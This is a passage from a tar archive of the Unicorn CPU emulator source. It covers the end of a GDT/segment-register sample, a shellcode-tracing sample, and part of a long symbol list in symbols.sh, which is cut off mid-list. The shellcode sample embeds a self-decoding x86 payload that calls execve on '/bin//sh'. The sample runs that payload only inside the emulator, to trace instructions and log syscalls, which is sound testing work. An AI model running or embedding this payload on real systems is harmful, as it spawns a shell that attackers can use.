gdt[17].dpl = 0; // set descriptor privilege level /* fprintf(stderr, "GDT: \n"); hex_dump((unsigned char*)gdt, 31 * sizeof(struct SegmentDescriptor)); */ // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); uc_assert_success(err); uc_hook_add(uc, &hook1, UC_HOOK_CODE, hook_code, NULL, code_address, code_address + sizeof(code) - 1); err = uc_hook_add(uc, &hook2, UC_HOOK_MEM_WRITE, hook_mem, NULL, (uint64_t)1, (uint64_t)0); uc_assert_success(err); // map 1 page of code for this emulation err = uc_mem_map(uc, code_address, 0x1000, UC_PROT_ALL); uc_assert_success(err); // map 1 page of stack for this emulation err = uc_mem_map(uc, stack_address, 0x1000, UC_PROT_READ | UC_PROT_WRITE); uc_assert_success(err); // map 64k for a GDT err = uc_mem_map(uc, gdt_address, 0x10000, UC_PROT_WRITE | UC_PROT_READ); uc_assert_success(err); // set up a GDT BEFORE you manipulate any segment registers err = uc_reg_write(uc, UC_X86_REG_GDTR, &gdtr); uc_assert_success(err); // write gdt to be emulated to memory err = uc_mem_write(uc, gdt_address, gdt, 31 * sizeof(struct SegmentDescriptor)); uc_assert_success(err); // map 1 page for FS err = uc_mem_map(uc, fs_address, 0x1000, UC_PROT_WRITE | UC_PROT_READ); uc_assert_success(err); // write machine code to be emulated to memory err = uc_mem_write(uc, code_address, code, sizeof(code) - 1); uc_assert_success(err); // initialize machine registers err = uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); uc_assert_success(err); // when setting SS, need rpl == cpl && dpl == cpl // emulator starts with cpl == 0, so we need a dpl 0 descriptor and rpl 0 // selector err = uc_reg_write(uc, UC_X86_REG_SS, &r_ss); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_CS, &r_cs); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_DS, &r_ds); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_ES, &r_es); uc_assert_success(err); err = uc_reg_write(uc, UC_X86_REG_FS, &r_fs); uc_assert_success(err); // emulate machine code in infinite time err = uc_emu_start(uc, code_address, code_address + sizeof(code) - 1, 0, 0); uc_assert_success(err); // read from memory err = uc_mem_read(uc, r_esp - 8, buf, 8); uc_assert_success(err); for (i = 0; i < 8; i++) { fprintf(stderr, "%02x", buf[i]); } fprintf(stderr, "\n"); assert(memcmp(buf, "\xef\xcd\xab\x89\x67\x45\x23\x01", 8) == 0); // read from memory err = uc_mem_read(uc, fs_address, buf, 8); uc_assert_success(err); assert(memcmp(buf, "\x67\x45\x23\x01\xef\xcd\xab\x89", 8) == 0); uc_close(uc); free(gdt); } /******************************************************************************/ int main(int argc, char **argv) { gdt_demo(); fprintf(stderr, "success\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/shellcode.c�������������������������������������������������������������������0000664�0000000�0000000�00000011334�14675241067�0016760�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to trace code with Linux code with syscall */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define X86_CODE32 \ "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd" \ "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c" \ "\x6f" #define X86_CODE32_SELF \ "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89" \ "\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31" \ "\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" \ "\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41" // memory address where emulation starts #define ADDRESS 0x1000000 #define MIN(a, b) (a < b ? a : b) // callback for tracing instruction static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { int r_eip; uint8_t tmp[16]; printf("Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); printf("*** EIP = %x ***: ", r_eip); size = MIN(sizeof(tmp), size); if (!uc_mem_read(uc, address, tmp, size)) { uint32_t i; for (i = 0; i < size; i++) { printf("%x ", tmp[i]); } printf("\n"); } } // callback for handling interrupt // ref: http://syscalls.kernelgrok.com/ static void hook_intr(uc_engine *uc, uint32_t intno, void *user_data) { int32_t r_eax, r_ecx, r_eip; uint32_t r_edx, size; unsigned char buffer[256]; // only handle Linux syscall if (intno != 0x80) return; uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); uc_reg_read(uc, UC_X86_REG_EIP, &r_eip); switch (r_eax) { default: printf(">>> 0x%x: interrupt 0x%x, EAX = 0x%x\n", r_eip, intno, r_eax); break; case 1: // sys_exit printf(">>> 0x%x: interrupt 0x%x, SYS_EXIT. quit!\n\n", r_eip, intno); uc_emu_stop(uc); break; case 4: // sys_write // ECX = buffer address uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); // EDX = buffer size uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); // read the buffer in size = MIN(sizeof(buffer) - 1, r_edx); if (!uc_mem_read(uc, r_ecx, buffer, size)) { buffer[size] = '\0'; printf(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = " "%u, content = '%s'\n", r_eip, intno, r_ecx, r_edx, buffer); } else { printf(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = " "%u (cannot get content)\n", r_eip, intno, r_ecx, r_edx); } break; } } static void test_i386(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_esp = ADDRESS + 0x200000; // ESP register printf("Emulate i386 code\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_SELF, sizeof(X86_CODE32_SELF) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ESP, &r_esp); // tracing all instructions by having @begin > @end uc_hook_add(uc, &trace1, UC_HOOK_CODE, hook_code, NULL, 1, 0); // handle interrupt ourself uc_hook_add(uc, &trace2, UC_HOOK_INTR, hook_intr, NULL, 1, 0); printf("\n>>> Start tracing this Linux code\n"); // emulate machine code in infinite time // err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_SELF), 0, // 12); <--- emulate only 12 instructions err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_SELF) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } printf("\n>>> Emulation done.\n"); uc_close(uc); } int main(int argc, char **argv, char **envp) { if (argc == 2) { if (!strcmp(argv[1], "-32")) { test_i386(); } else if (!strcmp(argv[1], "-h")) { printf("Syntax: %s <-32|-64>\n", argv[0]); } } else { test_i386(); } return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/symbols.sh����������������������������������������������������������������������������0000775�0000000�0000000�00000406163�14675241067�0015245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/bash CMD_PATH=$(realpath $0) SOURCE_DIR=$(dirname ${CMD_PATH}) COMMON_SYMBOLS=" unicorn_fill_tlb \ reg_read \ reg_write \ uc_init \ uc_add_inline_hook \ uc_del_inline_hook \ tb_invalidate_phys_range \ use_idiv_instructions \ arm_arch \ tb_target_set_jmp_target \ have_bmi1 \ have_popcnt \ have_avx1 \ have_avx2 \ have_isa \ have_altivec \ have_vsx \ flush_icache_range \ s390_facilities \ tcg_dump_op \ tcg_dump_ops \ tcg_gen_and_i64 \ tcg_gen_discard_i64 \ tcg_gen_ld16s_i64 \ tcg_gen_ld16u_i64 \ tcg_gen_ld32s_i64 \ tcg_gen_ld32u_i64 \ tcg_gen_ld8s_i64 \ tcg_gen_ld8u_i64 \ tcg_gen_ld_i64 \ tcg_gen_mov_i64 \ tcg_gen_movi_i64 \ tcg_gen_mul_i64 \ tcg_gen_or_i64 \ tcg_gen_sar_i64 \ tcg_gen_shl_i64 \ tcg_gen_shr_i64 \ tcg_gen_st_i64 \ tcg_gen_xor_i64 \ cpu_icount_to_ns \ cpu_is_stopped \ cpu_get_ticks \ cpu_get_clock \ cpu_resume \ qemu_init_vcpu \ cpu_stop_current \ resume_all_vcpus \ vm_start \ address_space_dispatch_compact \ flatview_translate \ address_space_translate_for_iotlb \ qemu_get_cpu \ cpu_address_space_init \ cpu_get_address_space \ cpu_exec_unrealizefn \ cpu_exec_initfn \ cpu_exec_realizefn \ tb_invalidate_phys_addr \ cpu_watchpoint_insert \ cpu_watchpoint_remove_by_ref \ cpu_watchpoint_remove_all \ cpu_watchpoint_address_matches \ cpu_breakpoint_insert \ cpu_breakpoint_remove \ cpu_breakpoint_remove_by_ref \ cpu_breakpoint_remove_all \ cpu_abort \ cpu_physical_memory_test_and_clear_dirty \ memory_region_section_get_iotlb \ flatview_add_to_dispatch \ qemu_ram_get_host_addr \ qemu_ram_get_offset \ qemu_ram_get_used_length \ qemu_ram_is_shared \ qemu_ram_pagesize \ qemu_ram_alloc_from_ptr \ qemu_ram_alloc \ qemu_ram_free \ qemu_map_ram_ptr \ qemu_ram_block_host_offset \ qemu_ram_block_from_host \ qemu_ram_addr_from_host \ cpu_check_watchpoint \ iotlb_to_section \ address_space_dispatch_new \ address_space_dispatch_free \ flatview_read_continue \ address_space_read_full \ address_space_write \ address_space_rw \ cpu_physical_memory_rw \ address_space_write_rom \ cpu_flush_icache_range \ cpu_exec_init_all \ address_space_access_valid \ address_space_map \ address_space_unmap \ cpu_physical_memory_map \ cpu_physical_memory_unmap \ cpu_memory_rw_debug \ qemu_target_page_size \ qemu_target_page_bits \ qemu_target_page_bits_min \ target_words_bigendian \ cpu_physical_memory_is_io \ ram_block_discard_range \ ramblock_is_pmem \ page_size_init \ set_preferred_target_page_bits \ finalize_target_page_bits \ cpu_outb \ cpu_outw \ cpu_outl \ cpu_inb \ cpu_inw \ cpu_inl \ memory_map \ memory_map_io \ memory_map_ptr \ memory_cow \ memory_unmap \ memory_moveout \ memory_movein \ memory_free \ flatview_unref \ address_space_get_flatview \ memory_region_transaction_begin \ memory_region_transaction_commit \ memory_region_init \ memory_region_access_valid \ memory_region_dispatch_read \ memory_region_dispatch_write \ memory_region_init_io \ memory_region_init_ram_ptr \ memory_region_size \ memory_region_set_readonly \ memory_region_get_ram_ptr \ memory_region_from_host \ memory_region_get_ram_addr \ memory_region_add_subregion \ memory_region_del_subregion \ memory_region_add_subregion_overlap \ memory_region_find \ memory_region_filter_subregions \ memory_listener_register \ memory_listener_unregister \ address_space_remove_listeners \ address_space_init \ address_space_destroy \ memory_region_init_ram \ memory_mapping_list_add_merge_sorted \ find_memory_mapping \ exec_inline_op \ floatx80_default_nan \ float_raise \ float16_is_quiet_nan \ float16_is_signaling_nan \ float32_is_quiet_nan \ float32_is_signaling_nan \ float64_is_quiet_nan \ float64_is_signaling_nan \ floatx80_is_quiet_nan \ floatx80_is_signaling_nan \ floatx80_silence_nan \ propagateFloatx80NaN \ float128_is_quiet_nan \ float128_is_signaling_nan \ float128_silence_nan \ float16_add \ float16_sub \ float32_add \ float32_sub \ float64_add \ float64_sub \ float16_mul \ float32_mul \ float64_mul \ float16_muladd \ float32_muladd \ float64_muladd \ float16_div \ float32_div \ float64_div \ float16_to_float32 \ float16_to_float64 \ float32_to_float16 \ float32_to_float64 \ float64_to_float16 \ float64_to_float32 \ float16_round_to_int \ float32_round_to_int \ float64_round_to_int \ float16_to_int16_scalbn \ float16_to_int32_scalbn \ float16_to_int64_scalbn \ float32_to_int16_scalbn \ float32_to_int32_scalbn \ float32_to_int64_scalbn \ float64_to_int16_scalbn \ float64_to_int32_scalbn \ float64_to_int64_scalbn \ float16_to_int16 \ float16_to_int32 \ float16_to_int64 \ float32_to_int16 \ float32_to_int32 \ float32_to_int64 \ float64_to_int16 \ float64_to_int32 \ float64_to_int64 \ float16_to_int16_round_to_zero \ float16_to_int32_round_to_zero \ float16_to_int64_round_to_zero \ float32_to_int16_round_to_zero \ float32_to_int32_round_to_zero \ float32_to_int64_round_to_zero \ float64_to_int16_round_to_zero \ float64_to_int32_round_to_zero \ float64_to_int64_round_to_zero \ float16_to_uint16_scalbn \ float16_to_uint32_scalbn \ float16_to_uint64_scalbn \ float32_to_uint16_scalbn \ float32_to_uint32_scalbn \ float32_to_uint64_scalbn \ float64_to_uint16_scalbn \ float64_to_uint32_scalbn \ float64_to_uint64_scalbn \ float16_to_uint16 \ float16_to_uint32 \ float16_to_uint64 \ float32_to_uint16 \ float32_to_uint32 \ float32_to_uint64 \ float64_to_uint16 \ float64_to_uint32 \ float64_to_uint64 \ float16_to_uint16_round_to_zero \ float16_to_uint32_round_to_zero \ float16_to_uint64_round_to_zero \ float32_to_uint16_round_to_zero \ float32_to_uint32_round_to_zero \ float32_to_uint64_round_to_zero \ float64_to_uint16_round_to_zero \ float64_to_uint32_round_to_zero \ float64_to_uint64_round_to_zero \ int64_to_float16_scalbn \ int32_to_float16_scalbn \ int16_to_float16_scalbn \ int64_to_float16 \ int32_to_float16 \ int16_to_float16 \ int64_to_float32_scalbn \ int32_to_float32_scalbn \ int16_to_float32_scalbn \ int64_to_float32 \ int32_to_float32 \ int16_to_float32 \ int64_to_float64_scalbn \ int32_to_float64_scalbn \ int16_to_float64_scalbn \ int64_to_float64 \ int32_to_float64 \ int16_to_float64 \ uint64_to_float16_scalbn \ uint32_to_float16_scalbn \ uint16_to_float16_scalbn \ uint64_to_float16 \ uint32_to_float16 \ uint16_to_float16 \ uint64_to_float32_scalbn \ uint32_to_float32_scalbn \ uint16_to_float32_scalbn \ uint64_to_float32 \ uint32_to_float32 \ uint16_to_float32 \ uint64_to_float64_scalbn \ uint32_to_float64_scalbn \ uint16_to_float64_scalbn \ uint64_to_float64 \ uint32_to_float64 \ uint16_to_float64 \ float16_min \ float16_minnum \ float16_minnummag \ float16_max \ float16_maxnum \ float16_maxnummag \ float32_min \ float32_minnum \ float32_minnummag \ float32_max \ float32_maxnum \ float32_maxnummag \ float64_min \ float64_minnum \ float64_minnummag \ float64_max \ float64_maxnum \ float64_maxnummag \ float16_compare \ float16_compare_quiet \ float32_compare \ float32_compare_quiet \ float64_compare \ float64_compare_quiet \ float16_scalbn \ float32_scalbn \ float64_scalbn \ float16_sqrt \ float32_sqrt \ float64_sqrt \ float16_default_nan \ float32_default_nan \ float64_default_nan \ float128_default_nan \ float16_silence_nan \ float32_silence_nan \ float64_silence_nan \ float16_squash_input_denormal \ float32_squash_input_denormal \ float64_squash_input_denormal \ normalizeFloatx80Subnormal \ roundAndPackFloatx80 \ normalizeRoundAndPackFloatx80 \ int32_to_floatx80 \ int32_to_float128 \ int64_to_floatx80 \ int64_to_float128 \ uint64_to_float128 \ float32_to_floatx80 \ float32_to_float128 \ float32_rem \ float32_exp2 \ float32_log2 \ float32_eq \ float32_le \ float32_lt \ float32_unordered \ float32_eq_quiet \ float32_le_quiet \ float32_lt_quiet \ float32_unordered_quiet \ float64_to_floatx80 \ float64_to_float128 \ float64_rem \ float64_log2 \ float64_eq \ float64_le \ float64_lt \ float64_unordered \ float64_eq_quiet \ float64_le_quiet \ float64_lt_quiet \ float64_unordered_quiet \ floatx80_to_int32 \ floatx80_to_int32_round_to_zero \ floatx80_to_int64 \ floatx80_to_int64_round_to_zero \ floatx80_to_float32 \ floatx80_to_float64 \ floatx80_to_float128 \ floatx80_round \ floatx80_round_to_int \ floatx80_add \ floatx80_sub \ floatx80_mul \ floatx80_div \ floatx80_rem \ floatx80_sqrt \ floatx80_eq \ floatx80_le \ floatx80_lt \ floatx80_unordered \ floatx80_eq_quiet \ floatx80_le_quiet \ floatx80_lt_quiet \ floatx80_unordered_quiet \ float128_to_int32 \ float128_to_int32_round_to_zero \ float128_to_int64 \ float128_to_int64_round_to_zero \ float128_to_uint64 \ float128_to_uint64_round_to_zero \ float128_to_uint32_round_to_zero \ float128_to_uint32 \ float128_to_float32 \ float128_to_float64 \ float128_to_floatx80 \ float128_round_to_int \ float128_add \ float128_sub \ float128_mul \ float128_div \ float128_rem \ float128_sqrt \ float128_eq \ float128_le \ float128_lt \ float128_unordered \ float128_eq_quiet \ float128_le_quiet \ float128_lt_quiet \ float128_unordered_quiet \ floatx80_compare \ floatx80_compare_quiet \ float128_compare \ float128_compare_quiet \ floatx80_scalbn \ float128_scalbn \ softfloat_init \ tcg_optimize \ gen_new_label \ tcg_can_emit_vec_op \ tcg_expand_vec_op \ tcg_register_jit \ tcg_tb_insert \ tcg_tb_remove \ tcg_tb_lookup \ tcg_tb_foreach \ tcg_nb_tbs \ tcg_region_reset_all \ tcg_region_init \ tcg_code_size \ tcg_code_capacity \ tcg_tb_phys_invalidate_count \ tcg_malloc_internal \ tcg_pool_reset \ tcg_context_init \ tcg_tb_alloc \ tcg_prologue_init \ tcg_func_start \ tcg_set_frame \ tcg_global_mem_new_internal \ tcg_temp_new_internal \ tcg_temp_new_vec \ tcg_temp_new_vec_matching \ tcg_temp_free_internal \ tcg_const_i32 \ tcg_const_i64 \ tcg_const_local_i32 \ tcg_const_local_i64 \ tcg_op_supported \ tcg_gen_callN \ tcg_op_remove \ tcg_emit_op \ tcg_op_insert_before \ tcg_op_insert_after \ tcg_cpu_exec_time \ tcg_gen_code \ tcg_gen_op1 \ tcg_gen_op2 \ tcg_gen_op3 \ tcg_gen_op4 \ tcg_gen_op5 \ tcg_gen_op6 \ tcg_gen_mb \ tcg_gen_addi_i32 \ tcg_gen_subfi_i32 \ tcg_gen_subi_i32 \ tcg_gen_andi_i32 \ tcg_gen_ori_i32 \ tcg_gen_xori_i32 \ tcg_gen_shli_i32 \ tcg_gen_shri_i32 \ tcg_gen_sari_i32 \ tcg_gen_brcond_i32 \ tcg_gen_brcondi_i32 \ tcg_gen_setcond_i32 \ tcg_gen_setcondi_i32 \ tcg_gen_muli_i32 \ tcg_gen_div_i32 \ tcg_gen_rem_i32 \ tcg_gen_divu_i32 \ tcg_gen_remu_i32 \ tcg_gen_andc_i32 \ tcg_gen_eqv_i32 \ tcg_gen_nand_i32 \ tcg_gen_nor_i32 \ tcg_gen_orc_i32 \ tcg_gen_clz_i32 \ tcg_gen_clzi_i32 \ tcg_gen_ctz_i32 \ tcg_gen_ctzi_i32 \ tcg_gen_clrsb_i32 \ tcg_gen_ctpop_i32 \ tcg_gen_rotl_i32 \ tcg_gen_rotli_i32 \ tcg_gen_rotr_i32 \ tcg_gen_rotri_i32 \ tcg_gen_deposit_i32 \ tcg_gen_deposit_z_i32 \ tcg_gen_extract_i32 \ tcg_gen_sextract_i32 \ tcg_gen_extract2_i32 \ tcg_gen_movcond_i32 \ tcg_gen_add2_i32 \ tcg_gen_sub2_i32 \ tcg_gen_mulu2_i32 \ tcg_gen_muls2_i32 \ tcg_gen_mulsu2_i32 \ tcg_gen_ext8s_i32 \ tcg_gen_ext16s_i32 \ tcg_gen_ext8u_i32 \ tcg_gen_ext16u_i32 \ tcg_gen_bswap16_i32 \ tcg_gen_bswap32_i32 \ tcg_gen_smin_i32 \ tcg_gen_umin_i32 \ tcg_gen_smax_i32 \ tcg_gen_umax_i32 \ tcg_gen_abs_i32 \ tcg_gen_addi_i64 \ tcg_gen_subfi_i64 \ tcg_gen_subi_i64 \ tcg_gen_andi_i64 \ tcg_gen_ori_i64 \ tcg_gen_xori_i64 \ tcg_gen_shli_i64 \ tcg_gen_shri_i64 \ tcg_gen_sari_i64 \ tcg_gen_brcond_i64 \ tcg_gen_brcondi_i64 \ tcg_gen_setcond_i64 \ tcg_gen_setcondi_i64 \ tcg_gen_muli_i64 \ tcg_gen_div_i64 \ tcg_gen_rem_i64 \ tcg_gen_divu_i64 \ tcg_gen_remu_i64 \ tcg_gen_ext8s_i64 \ tcg_gen_ext16s_i64 \ tcg_gen_ext32s_i64 \ tcg_gen_ext8u_i64 \ tcg_gen_ext16u_i64 \ tcg_gen_ext32u_i64 \ tcg_gen_bswap16_i64 \ tcg_gen_bswap32_i64 \ tcg_gen_bswap64_i64 \ tcg_gen_not_i64 \ tcg_gen_andc_i64 \ tcg_gen_eqv_i64 \ tcg_gen_nand_i64 \ tcg_gen_nor_i64 \ tcg_gen_orc_i64 \ tcg_gen_clz_i64 \ tcg_gen_clzi_i64 \ tcg_gen_ctz_i64 \ tcg_gen_ctzi_i64 \ tcg_gen_clrsb_i64 \ tcg_gen_ctpop_i64 \ tcg_gen_rotl_i64 \ tcg_gen_rotli_i64 \ tcg_gen_rotr_i64 \ tcg_gen_rotri_i64 \ tcg_gen_deposit_i64 \ tcg_gen_deposit_z_i64 \ tcg_gen_extract_i64 \ tcg_gen_sextract_i64 \ tcg_gen_extract2_i64 \ tcg_gen_movcond_i64 \ tcg_gen_add2_i64 \ tcg_gen_sub2_i64 \ tcg_gen_mulu2_i64 \ tcg_gen_muls2_i64 \ tcg_gen_mulsu2_i64 \ tcg_gen_smin_i64 \ tcg_gen_umin_i64 \ tcg_gen_smax_i64 \ tcg_gen_umax_i64 \ tcg_gen_abs_i64 \ tcg_gen_extrl_i64_i32 \ tcg_gen_extrh_i64_i32 \ tcg_gen_extu_i32_i64 \ tcg_gen_ext_i32_i64 \ tcg_gen_concat_i32_i64 \ tcg_gen_extr_i64_i32 \ tcg_gen_extr32_i64 \ tcg_gen_exit_tb \ tcg_gen_goto_tb \ tcg_gen_lookup_and_goto_ptr \ check_exit_request \ tcg_gen_qemu_ld_i32 \ tcg_gen_qemu_st_i32 \ tcg_gen_qemu_ld_i64 \ tcg_gen_qemu_st_i64 \ tcg_gen_atomic_cmpxchg_i32 \ tcg_gen_atomic_cmpxchg_i64 \ tcg_gen_atomic_fetch_add_i32 \ tcg_gen_atomic_fetch_add_i64 \ tcg_gen_atomic_fetch_and_i32 \ tcg_gen_atomic_fetch_and_i64 \ tcg_gen_atomic_fetch_or_i32 \ tcg_gen_atomic_fetch_or_i64 \ tcg_gen_atomic_fetch_xor_i32 \ tcg_gen_atomic_fetch_xor_i64 \ tcg_gen_atomic_fetch_smin_i32 \ tcg_gen_atomic_fetch_smin_i64 \ tcg_gen_atomic_fetch_umin_i32 \ tcg_gen_atomic_fetch_umin_i64 \ tcg_gen_atomic_fetch_smax_i32 \ tcg_gen_atomic_fetch_smax_i64 \ tcg_gen_atomic_fetch_umax_i32 \ tcg_gen_atomic_fetch_umax_i64 \ tcg_gen_atomic_add_fetch_i32 \ tcg_gen_atomic_add_fetch_i64 \ tcg_gen_atomic_and_fetch_i32 \ tcg_gen_atomic_and_fetch_i64 \ tcg_gen_atomic_or_fetch_i32 \ tcg_gen_atomic_or_fetch_i64 \ tcg_gen_atomic_xor_fetch_i32 \ tcg_gen_atomic_xor_fetch_i64 \ tcg_gen_atomic_smin_fetch_i32 \ tcg_gen_atomic_smin_fetch_i64 \ tcg_gen_atomic_umin_fetch_i32 \ tcg_gen_atomic_umin_fetch_i64 \ tcg_gen_atomic_smax_fetch_i32 \ tcg_gen_atomic_smax_fetch_i64 \ tcg_gen_atomic_umax_fetch_i32 \ tcg_gen_atomic_umax_fetch_i64 \ tcg_gen_atomic_xchg_i32 \ tcg_gen_atomic_xchg_i64 \ simd_desc \ tcg_gen_gvec_2_ool \ tcg_gen_gvec_2i_ool \ tcg_gen_gvec_3_ool \ tcg_gen_gvec_4_ool \ tcg_gen_gvec_5_ool \ tcg_gen_gvec_2_ptr \ tcg_gen_gvec_3_ptr \ tcg_gen_gvec_4_ptr \ tcg_gen_gvec_5_ptr \ tcg_gen_gvec_2 \ tcg_gen_gvec_2i \ tcg_gen_gvec_2s \ tcg_gen_gvec_3 \ tcg_gen_gvec_3i \ tcg_gen_gvec_4 \ tcg_gen_gvec_mov \ tcg_gen_gvec_dup_i32 \ tcg_gen_gvec_dup_i64 \ tcg_gen_gvec_dup_mem \ tcg_gen_gvec_dup64i \ tcg_gen_gvec_dup32i \ tcg_gen_gvec_dup16i \ tcg_gen_gvec_dup8i \ tcg_gen_gvec_not \ tcg_gen_vec_add8_i64 \ tcg_gen_vec_add16_i64 \ tcg_gen_vec_add32_i64 \ tcg_gen_gvec_add \ tcg_gen_gvec_adds \ tcg_gen_gvec_addi \ tcg_gen_gvec_subs \ tcg_gen_vec_sub8_i64 \ tcg_gen_vec_sub16_i64 \ tcg_gen_vec_sub32_i64 \ tcg_gen_gvec_sub \ tcg_gen_gvec_mul \ tcg_gen_gvec_muls \ tcg_gen_gvec_muli \ tcg_gen_gvec_ssadd \ tcg_gen_gvec_sssub \ tcg_gen_gvec_usadd \ tcg_gen_gvec_ussub \ tcg_gen_gvec_smin \ tcg_gen_gvec_umin \ tcg_gen_gvec_smax \ tcg_gen_gvec_umax \ tcg_gen_vec_neg8_i64 \ tcg_gen_vec_neg16_i64 \ tcg_gen_vec_neg32_i64 \ tcg_gen_gvec_neg \ tcg_gen_gvec_abs \ tcg_gen_gvec_and \ tcg_gen_gvec_or \ tcg_gen_gvec_xor \ tcg_gen_gvec_andc \ tcg_gen_gvec_orc \ tcg_gen_gvec_nand \ tcg_gen_gvec_nor \ tcg_gen_gvec_eqv \ tcg_gen_gvec_ands \ tcg_gen_gvec_andi \ tcg_gen_gvec_xors \ tcg_gen_gvec_xori \ tcg_gen_gvec_ors \ tcg_gen_gvec_ori \ tcg_gen_vec_shl8i_i64 \ tcg_gen_vec_shl16i_i64 \ tcg_gen_gvec_shli \ tcg_gen_vec_shr8i_i64 \ tcg_gen_vec_shr16i_i64 \ tcg_gen_gvec_shri \ tcg_gen_vec_sar8i_i64 \ tcg_gen_vec_sar16i_i64 \ tcg_gen_gvec_sari \ tcg_gen_gvec_shls \ tcg_gen_gvec_shrs \ tcg_gen_gvec_sars \ tcg_gen_gvec_shlv \ tcg_gen_gvec_shrv \ tcg_gen_gvec_sarv \ tcg_gen_gvec_cmp \ tcg_gen_gvec_bitsel \ tcg_can_emit_vecop_list \ vec_gen_2 \ vec_gen_3 \ vec_gen_4 \ tcg_gen_mov_vec \ tcg_const_zeros_vec \ tcg_const_ones_vec \ tcg_const_zeros_vec_matching \ tcg_const_ones_vec_matching \ tcg_gen_dup64i_vec \ tcg_gen_dup32i_vec \ tcg_gen_dup16i_vec \ tcg_gen_dup8i_vec \ tcg_gen_dupi_vec \ tcg_gen_dup_i64_vec \ tcg_gen_dup_i32_vec \ tcg_gen_dup_mem_vec \ tcg_gen_ld_vec \ tcg_gen_st_vec \ tcg_gen_stl_vec \ tcg_gen_and_vec \ tcg_gen_or_vec \ tcg_gen_xor_vec \ tcg_gen_andc_vec \ tcg_gen_orc_vec \ tcg_gen_nand_vec \ tcg_gen_nor_vec \ tcg_gen_eqv_vec \ tcg_gen_not_vec \ tcg_gen_neg_vec \ tcg_gen_abs_vec \ tcg_gen_shli_vec \ tcg_gen_shri_vec \ tcg_gen_sari_vec \ tcg_gen_cmp_vec \ tcg_gen_add_vec \ tcg_gen_sub_vec \ tcg_gen_mul_vec \ tcg_gen_ssadd_vec \ tcg_gen_usadd_vec \ tcg_gen_sssub_vec \ tcg_gen_ussub_vec \ tcg_gen_smin_vec \ tcg_gen_umin_vec \ tcg_gen_smax_vec \ tcg_gen_umax_vec \ tcg_gen_shlv_vec \ tcg_gen_shrv_vec \ tcg_gen_sarv_vec \ tcg_gen_shls_vec \ tcg_gen_shrs_vec \ tcg_gen_sars_vec \ tcg_gen_bitsel_vec \ tcg_gen_cmpsel_vec \ tb_htable_lookup \ tb_set_jmp_target \ cpu_exec \ cpu_loop_exit_noexc \ cpu_reloading_memory_map \ cpu_loop_exit \ cpu_loop_exit_restore \ cpu_loop_exit_atomic \ tlb_init \ tlb_flush_by_mmuidx \ tlb_flush \ tlb_flush_by_mmuidx_all_cpus \ tlb_flush_all_cpus \ tlb_flush_by_mmuidx_all_cpus_synced \ tlb_flush_all_cpus_synced \ tlb_flush_page_by_mmuidx \ tlb_flush_page \ tlb_flush_page_by_mmuidx_all_cpus \ tlb_flush_page_all_cpus \ tlb_flush_page_by_mmuidx_all_cpus_synced \ tlb_flush_page_all_cpus_synced \ tlb_protect_code \ tlb_unprotect_code \ tlb_reset_dirty \ tlb_set_dirty \ tlb_set_page_with_attrs \ tlb_set_page \ get_page_addr_code_hostp \ get_page_addr_code \ probe_access \ tlb_vaddr_to_host \ helper_ret_ldub_mmu \ helper_le_lduw_mmu \ helper_be_lduw_mmu \ helper_le_ldul_mmu \ helper_be_ldul_mmu \ helper_le_ldq_mmu \ helper_be_ldq_mmu \ helper_ret_ldsb_mmu \ helper_le_ldsw_mmu \ helper_be_ldsw_mmu \ helper_le_ldsl_mmu \ helper_be_ldsl_mmu \ cpu_ldub_mmuidx_ra \ cpu_ldsb_mmuidx_ra \ cpu_lduw_mmuidx_ra \ cpu_ldsw_mmuidx_ra \ cpu_ldl_mmuidx_ra \ cpu_ldq_mmuidx_ra \ cpu_ldub_data_ra \ cpu_ldsb_data_ra \ cpu_lduw_data_ra \ cpu_ldsw_data_ra \ 